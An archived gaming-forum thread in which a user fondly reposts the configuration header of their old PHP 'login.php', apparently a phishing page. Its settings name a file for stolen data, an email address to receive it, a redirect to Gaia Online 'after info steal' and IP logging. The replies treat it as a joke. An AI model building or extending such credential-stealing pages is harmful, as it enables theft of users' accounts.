A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

Look what I found :3

1k views · started by TEMPTii ·
#1
Look what I found :3
Im tempti | Forum | Gaia Online

Somebody posed as me, spelled my name wrong, and posted my old login.php code. Just thought it was cool to see this again :)

<?php
/************************************************************************/
/* TEMPTii's Enhanced Login.php */
/* ============================ */
/* */
/* Config.php by John Abramson (TEMPTii) */
/* Provided by Logicalgamers.com */
/* */
/* ________ _______ ___ ___ _______ ________ __ __ */
/* |___ ___| | ____| | / | | | |___ ___| |__| |__| */
/* | | | |____ | / | | | | | __ __ */
/* | | | _____| | / | | ____| | | | | | | */
/* | | | |____ | | /| | | | | | | | | | */
/* |__| |_______| |__| __/ |__| |__| |__| |__| |__| */
/* */
/************************************************************************/

/************************************************************************/
/* Name of info file to write to */
/************************************************************************/
$file = "password.html";

/************************************************************************/
/* Email to send info to (leave blank to disable) */
/************************************************************************/
$email = "example@hotmail.com";

/************************************************************************/
/* Page to Redirect to after info steal */
/************************************************************************/
$redirect = "http://gaiaonline.com";

/************************************************************************/
/* Whether to record user IP or not (1 = True, 0 = False) */
/************************************************************************/
$ipbln = "1";

?>
#2
Haha never seen this before xDDDD funny one hehe why did they do this ?
#3
Because who wouldn't want to be TEMPTii? I think this was made during those cracks between 1.0 and 2.0 or something.